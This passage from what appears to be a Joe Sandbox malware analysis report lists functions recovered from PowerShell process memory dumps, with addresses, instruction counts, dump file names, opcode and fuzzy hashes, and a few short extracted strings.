                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd9b850000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ?_H
                                                                                                                                                  • API String ID: 0-1095511010
                                                                                                                                                  • Opcode ID: a72370a7bf4f3cde6ed4427b79ab30ec4f271228d36191449dc9d86d31ba75f5
                                                                                                                                                  • Instruction ID: c6b9ea8c913cb7e7dbfa63eaf737e8659600ed712e09c2490aee8ae376abad3c
                                                                                                                                                  • Opcode Fuzzy Hash: a72370a7bf4f3cde6ed4427b79ab30ec4f271228d36191449dc9d86d31ba75f5
                                                                                                                                                  • Instruction Fuzzy Hash: B16145B2F1FA8A0FE7A59BE848613B43AD1EF19350B5A00FAD45CC71E3D948AD058341
                                                                                                                                                  Function 00007FFD9B78CF75 Relevance: .7, Instructions: 690COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1959409725.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd9b780000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c5608caea64ba21c67c80e92ae26b60870961ad0bab60fca67dee3f28977c7fe
                                                                                                                                                  • Instruction ID: c262a659c201e695824465d85488afa88791427cdc7a293ba66048bceabc71fd
                                                                                                                                                  • Opcode Fuzzy Hash: c5608caea64ba21c67c80e92ae26b60870961ad0bab60fca67dee3f28977c7fe
                                                                                                                                                  • Instruction Fuzzy Hash: 00328330A18A4D8FDF98DF58C4A5AAD77E1FF98311F11026EE409D72A6CA35E841CB81
                                                                                                                                                  Function 00007FFD9B78B4E6 Relevance: .3, Instructions: 332COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1959409725.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd9b780000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e4f1a0d8d6d6757b645156d045464b6386ed72f098dfbe83a4e4ebcce4669ee3
                                                                                                                                                  • Instruction ID: d6113b4e76cb44d7995c1879c5eaa3107236347c5e2a6b2b4f7b5cbcf690b078
                                                                                                                                                  • Opcode Fuzzy Hash: e4f1a0d8d6d6757b645156d045464b6386ed72f098dfbe83a4e4ebcce4669ee3
                                                                                                                                                  • Instruction Fuzzy Hash: 63B1D530609B8D8FDB68DF28C8557E93BE1FF55311F04426EE84DC72A2CA35A9418B82
                                                                                                                                                  Function 00007FFD9B859869 Relevance: .3, Instructions: 310COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1960142207.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd9b850000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4204f1c10d0f942612de33fc9fbfd7b5a593561282a484038765a6a4f05c8f62
                                                                                                                                                  • Instruction ID: 84da7862e25cadfdd371cbb42ca3843828821281073f20cdc6ce043c1ce67c7c
                                                                                                                                                  • Opcode Fuzzy Hash: 4204f1c10d0f942612de33fc9fbfd7b5a593561282a484038765a6a4f05c8f62
                                                                                                                                                  • Instruction Fuzzy Hash: 9491E621A0F7990FE7669BE448795753FE1EF5A200B0A04FAD48CCB1E3D9596D05C352
                                                                                                                                                  Function 00007FFD9B854281 Relevance: .2, Instructions: 242COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1960142207.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd9b850000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2f1d4b34bb39c1f10683329636e0e2491906ea4e9c96e59d1be85331a681e0fd
                                                                                                                                                  • Instruction ID: 92aa0e52c2fc6946941a6ede9066c5cb2f07e9ee9c41e88d4f91bae776b83f9e
                                                                                                                                                  • Opcode Fuzzy Hash: 2f1d4b34bb39c1f10683329636e0e2491906ea4e9c96e59d1be85331a681e0fd
                                                                                                                                                  • Instruction Fuzzy Hash: 2D610532B1FA4B0FF7A997A818715B972D1EF58210B5D01FED15EC31FBED58A8018241
                                                                                                                                                  Function 00007FFD9B85A26A Relevance: .2, Instructions: 224COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1960142207.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd9b850000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: acb08faaec59d13ec3ec1356a49e08d7261959319adfc63d8506e1142fe4a0ea
                                                                                                                                                  • Instruction ID: 339756a74cfe2c0e876d81d88dc9be6d9ce4325d2b299a8b14910a7f6f3d03b9
                                                                                                                                                  • Opcode Fuzzy Hash: acb08faaec59d13ec3ec1356a49e08d7261959319adfc63d8506e1142fe4a0ea
                                                                                                                                                  • Instruction Fuzzy Hash: 90612931A0F7CE1FD7629BA858A55A57FE0EF5B214B0900FBD08CCB0E3DA696945C351
                                                                                                                                                  Function 00007FFD9B859342 Relevance: .2, Instructions: 180COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1960142207.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd9b850000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 88d91e88f5b91c9c831a924549c95291da28a747ba7ae27e831538491df62495
                                                                                                                                                  • Instruction ID: a044c103b3298a11fb76318215744db3c1be35e712acf41d63c152edc0c0a065
                                                                                                                                                  • Opcode Fuzzy Hash: 88d91e88f5b91c9c831a924549c95291da28a747ba7ae27e831538491df62495
                                                                                                                                                  • Instruction Fuzzy Hash: DB513832A0EB854FE765EBA888691A87BD1EF65310F1404FDD05C871D3CE246D058342
                                                                                                                                                  Function 00007FFD9B85A7DA Relevance: .2, Instructions: 168COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1960142207.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd9b850000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6f8d9a6cb71b6658919d20edb4ee81e8e0ca7159d55348b94522d21dcab9dc13
                                                                                                                                                  • Instruction ID: 8b255c1a359e51387dd1ea737779871819bde367821107f2a73df3edd326b8de
                                                                                                                                                  • Opcode Fuzzy Hash: 6f8d9a6cb71b6658919d20edb4ee81e8e0ca7159d55348b94522d21dcab9dc13
                                                                                                                                                  • Instruction Fuzzy Hash: 20514772F0EB890FE754EB9888A51A8B7E1EF69310F1901FED05C871E3DE246D058342
                                                                                                                                                  Function 00007FFD9B859FCA Relevance: .2, Instructions: 164COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1960142207.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd9b850000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d30931bec1287daf71941a1179f00dcb694cac1509e4715564c7f1eea27c446f
                                                                                                                                                  • Instruction ID: 27e281f7a9978e4157f8dac7fd2611cf4a513b083d3bed9fd1989991bcd3a2a8
                                                                                                                                                  • Opcode Fuzzy Hash: d30931bec1287daf71941a1179f00dcb694cac1509e4715564c7f1eea27c446f
                                                                                                                                                  • Instruction Fuzzy Hash: 4D512532E0EB895FE764EBA848A55A8B7D1EF69310F1801FED05D871D3DE28AD048342
                                                                                                                                                  Function 00007FFD9B859AA9 Relevance: .2, Instructions: 163COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1960142207.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd9b850000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e5317813c93a485c6beafedd40eb7106a0f4734b9506d8491e777d87307d964f
                                                                                                                                                  • Instruction ID: 0fd02d4a319c57bf1141b1cdddab9fd9c48db9a4adaedd4363a011dc6188b871
                                                                                                                                                  • Opcode Fuzzy Hash: e5317813c93a485c6beafedd40eb7106a0f4734b9506d8491e777d87307d964f
                                                                                                                                                  • Instruction Fuzzy Hash: 66511821B0EB990FEB62DBA848655A57BE1EF5A210F1904FBD49CC71E3DE58AC04C352
                                                                                                                                                  Function 00007FFD9B855382 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1960142207.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd9b850000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b28140618f36cfb3663a5c850a2fdd8090a413df2079490d25b331351f16194e
                                                                                                                                                  • Instruction ID: 152798a48873a28e52886d05866ad906ffe8e905e698cc80e617fca61abaeb24
                                                                                                                                                  • Opcode Fuzzy Hash: b28140618f36cfb3663a5c850a2fdd8090a413df2079490d25b331351f16194e
                                                                                                                                                  • Instruction Fuzzy Hash: 6A31E1A2F1FA8A0BF7B597D818763F876D1AF19250B5A00FAE45DC71E3ED887D014242
                                                                                                                                                  Function 00007FFD9B854354 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1960142207.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd9b850000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9fcdb030ff2bdcf74d659185fcdea082ade2614b88a73a9acc3496343cf5a82f
                                                                                                                                                  • Instruction ID: 81be404bc1368365738b3c635eae8efb6274da6db95bc7b973d96fd32744a58c
                                                                                                                                                  • Opcode Fuzzy Hash: 9fcdb030ff2bdcf74d659185fcdea082ade2614b88a73a9acc3496343cf5a82f
                                                                                                                                                  • Instruction Fuzzy Hash: 0121E532B1FA4A0FE3B997A814755B466C2EF58251B5E00FEE05DC71FBED59AC054201
                                                                                                                                                  Function 00007FFD9B78AFE4 Relevance: .1, Instructions: 91COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1959409725.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd9b780000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 47bd5a224db351259fa216122a38933a44d22fbbabf08e96681e598f0b6d8edc
                                                                                                                                                  • Instruction ID: 3c25ef906d35c92f024571047cfe0016dd714b4ef26199c182b479dd71829625
                                                                                                                                                  • Opcode Fuzzy Hash: 47bd5a224db351259fa216122a38933a44d22fbbabf08e96681e598f0b6d8edc
                                                                                                                                                  • Instruction Fuzzy Hash: 40310030A19A4DCEFBB49F54CC99BF93290FF4531AF410239D41D861B2CA7A6A45CB51
                                                                                                                                                  Function 00007FFD9B8553C9 Relevance: .1, Instructions: 83COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1960142207.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd9b850000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e37f23337ea5d6595860db121d96fe11807151caf159fe6e1c9d8bc7361d20a4
                                                                                                                                                  • Instruction ID: a4c788b287bbf6c45ac0c629e33e4cb3c42f06cf139aaeb643d0029b99f45cd8
                                                                                                                                                  • Opcode Fuzzy Hash: e37f23337ea5d6595860db121d96fe11807151caf159fe6e1c9d8bc7361d20a4
                                                                                                                                                  • Instruction Fuzzy Hash: A8213362F1FA9A0FE3B597D818622F876C1EF18210B9A01F6E45CC71E3DD487C004281
                                                                                                                                                  Function 00007FFD9B858FED Relevance: .1, Instructions: 64COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1960142207.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd9b850000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f007a8ec1357bab6c2a1fa0d663d1cb108beba9c92fe256132f0e801dba3e158
                                                                                                                                                  • Instruction ID: b0d0938b5e4ae502f50fd37808e1b9b123c431e2f376b732192a7ee60dde9356
                                                                                                                                                  • Opcode Fuzzy Hash: f007a8ec1357bab6c2a1fa0d663d1cb108beba9c92fe256132f0e801dba3e158
                                                                                                                                                  • Instruction Fuzzy Hash: BB11C461A0FAD90FEBA6D7B848A58657BD1DF1674071908EAD08DCB1E7E808AC048392
                                                                                                                                                  Function 00007FFD9B783945 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1959409725.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd9b780000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                  • Instruction ID: 83d6700527b241215258cbc7bac5ef6afde9bf44466a681ea14fe8d426ce20e9
                                                                                                                                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                  • Instruction Fuzzy Hash: 7501677121CB0C4FD748EF0CE451AA5B7E0FB95365F10056EE58AC36A5D636E881CB45
                                                                                                                                                  Function 00007FFD9B858A1A Relevance: .0, Instructions: 35COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1960142207.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd9b850000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b601dc891d61799b0c3c139a3a94db74f09d5a098d3217d11552fe58fa5bab6f
                                                                                                                                                  • Instruction ID: 0b33b39bfba75bd0e6307037476eb9c2642bd92d052250a591f6504188cce535
                                                                                                                                                  • Opcode Fuzzy Hash: b601dc891d61799b0c3c139a3a94db74f09d5a098d3217d11552fe58fa5bab6f
                                                                                                                                                  • Instruction Fuzzy Hash: CFE02227B59E0D0EE79697AC18251F9B3D2EFC8132B4602B3D16EC71A6ED21D8064241
                                                                                                                                                  Function 00007FFD9B8543F1 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1960142207.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd9b850000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0645695c06677a90fc1bc77aec947449be495f6c68202840d0fa5b265bdab36f
                                                                                                                                                  • Instruction ID: 9d593b185137531f9e7749de5c7c6c1e20ea1f63928a1e20146c95f5262f2359
                                                                                                                                                  • Opcode Fuzzy Hash: 0645695c06677a90fc1bc77aec947449be495f6c68202840d0fa5b265bdab36f
                                                                                                                                                  • Instruction Fuzzy Hash: 72E09231B1D6098ED328AB58E4664F8B3E1FB44315B5400FEE10EC35A2DE36F841C780
                                                                                                                                                  Function 00007FFD9B858DD9 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1960142207.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd9b850000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 1899684aa31f0752a81f1158dbbae16210f4c821430e86b31671bfb63692d014
                                                                                                                                                  • Instruction ID: 491098e72fee73f0ee246bf0bf66e0e3c1e4ecd6c08a8e17d7fcc5e87c254486
                                                                                                                                                  • Opcode Fuzzy Hash: 1899684aa31f0752a81f1158dbbae16210f4c821430e86b31671bfb63692d014
                                                                                                                                                  • Instruction Fuzzy Hash: A9E0DF33B1EA0D0AFB996A9C28210F8B2D1DF8422074404BBE14EC2497E82AA8120285
                                                                                                                                                  Function 00007FFD9B8512A1 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1960142207.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd9b850000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3c6abc0ebc4de20069b124b56e661dc946c7e741cbe576f44d07dcea790e22bd
                                                                                                                                                  • Instruction ID: 61595629ad17722c3a7b5d672f58d7477a37b2757b4b33e7ec897b8d214d5370
                                                                                                                                                  • Opcode Fuzzy Hash: 3c6abc0ebc4de20069b124b56e661dc946c7e741cbe576f44d07dcea790e22bd
                                                                                                                                                  • Instruction Fuzzy Hash: 85E0DF13F0F68E0FE790B37C08290A82AD1EFA925072444FBC008C70E7DC5C5C094341

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 049CE6A8 Relevance: .3, Instructions: 281COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2159980044.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_49c0000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a33d0356d8ad74660b9bcb7b4be1cb5b7b548adffc098cbe63a26bec93b92e7a
                                                                                                                                                  • Instruction ID: 5e1177996a36d72d98b45f44f817f4a5b47b819658acfd081f32c86db6812775
                                                                                                                                                  • Opcode Fuzzy Hash: a33d0356d8ad74660b9bcb7b4be1cb5b7b548adffc098cbe63a26bec93b92e7a
                                                                                                                                                  • Instruction Fuzzy Hash: 2DB14D70E00209DFDF14CFA9C98579DBBF6AF88314F14853DE816A7294EB74A845CB92
                                                                                                                                                  Function 049CEF78 Relevance: .3, Instructions: 266COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2159980044.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_49c0000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 30847c53a7c904106cacfb2374303883b33b9403235d61de02607f5471ac374c
                                                                                                                                                  • Instruction ID: 5a8c47a3691c213323ca377856332cdc55793cd3b1ee12f2cac35a63a8510182
                                                                                                                                                  • Opcode Fuzzy Hash: 30847c53a7c904106cacfb2374303883b33b9403235d61de02607f5471ac374c
                                                                                                                                                  • Instruction Fuzzy Hash: 46B14C70E00209DFDB14CFA9C9857ADBBF6AF88714F14853DD815E7298EB74A845CB82
                                                                                                                                                  Function 049C8F99 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2159980044.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_49c0000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: eb28199d1bf323b2a4a00a2cb46e65f77d648d220210b01124376f2aa9377ce5
                                                                                                                                                  • Instruction ID: 441379a93ab2e21b83e8f532bba42f68102631626983fec2bf596147a78df707
                                                                                                                                                  • Opcode Fuzzy Hash: eb28199d1bf323b2a4a00a2cb46e65f77d648d220210b01124376f2aa9377ce5
                                                                                                                                                  • Instruction Fuzzy Hash: C1418E75B00A048FD714DF24D958AAD7BB6EF89750F04446CE406EB7A0CF35AC45CB51
                                                                                                                                                  Function 07695D50 Relevance: 13.5, Strings: 10, Instructions: 1035COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2199390333.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_7690000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$tPfq$tPfq
                                                                                                                                                  • API String ID: 0-1228898332
                                                                                                                                                  • Opcode ID: 871af6cc204f1ab5f60289cc1d5f024664a44e31d1886a8d894e6672a9e0eb4f
                                                                                                                                                  • Instruction ID: 93b592f0a96a90fbc081470f64b1e3dc499f500b8b3bdeaf0f694900fa4dafb0
                                                                                                                                                  • Opcode Fuzzy Hash: 871af6cc204f1ab5f60289cc1d5f024664a44e31d1886a8d894e6672a9e0eb4f
                                                                                                                                                  • Instruction Fuzzy Hash: 6482B4B4E10215DFDF25CFA8C851BAEBBB6AF85304F1480A9D506AB781CB35DC85CB91
                                                                                                                                                  Function 07692BA0 Relevance: 9.1, Strings: 7, Instructions: 332COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2199390333.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_7690000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4'fq$4'fq$tPfq$tPfq$$fq$$fq$$fq
                                                                                                                                                  • API String ID: 0-332123906
                                                                                                                                                  • Opcode ID: b09445f77fd6c8e548412cd6caa200463732d42c216ce813f0591a582caeb141
                                                                                                                                                  • Instruction ID: c2214b919ea3e9419e042e20ad1482b718014b32f94f473b31c6e3a13b10ba6b
                                                                                                                                                  • Opcode Fuzzy Hash: b09445f77fd6c8e548412cd6caa200463732d42c216ce813f0591a582caeb141
                                                                                                                                                  • Instruction Fuzzy Hash: 2AC12DB1604345EFCF158B78C864766BFA9FF86314F1880AAD5468F392DB31D845C791
                                                                                                                                                  Function 07697830 Relevance: 7.8, Strings: 6, Instructions: 339COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2199390333.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_7690000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq
                                                                                                                                                  • API String ID: 0-1373546133
                                                                                                                                                  • Opcode ID: 072c0881b621c305117ff534c5e0d79cb8d67636e1a5a5e335bcfba0d44a30d5
                                                                                                                                                  • Instruction ID: d47cd4f630bc6d0201500decb4e084674a97537540a9014cd3b26e9c3c5f5505
                                                                                                                                                  • Opcode Fuzzy Hash: 072c0881b621c305117ff534c5e0d79cb8d67636e1a5a5e335bcfba0d44a30d5
                                                                                                                                                  • Instruction Fuzzy Hash: 02D17FB4A102099FDB18DFA8C455BAEBBB2EF84304F14C069E5026F755CB75EC86CB91
                                                                                                                                                  Function 07691020 Relevance: 5.4, Strings: 4, Instructions: 422COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2199390333.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_7690000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4'fq$4'fq$$fq$$fq
                                                                                                                                                  • API String ID: 0-2206495126
                                                                                                                                                  • Opcode ID: c5852a357e15fb80b5b9123c838066f508a207cbd5df0af066214a3251a23f8b
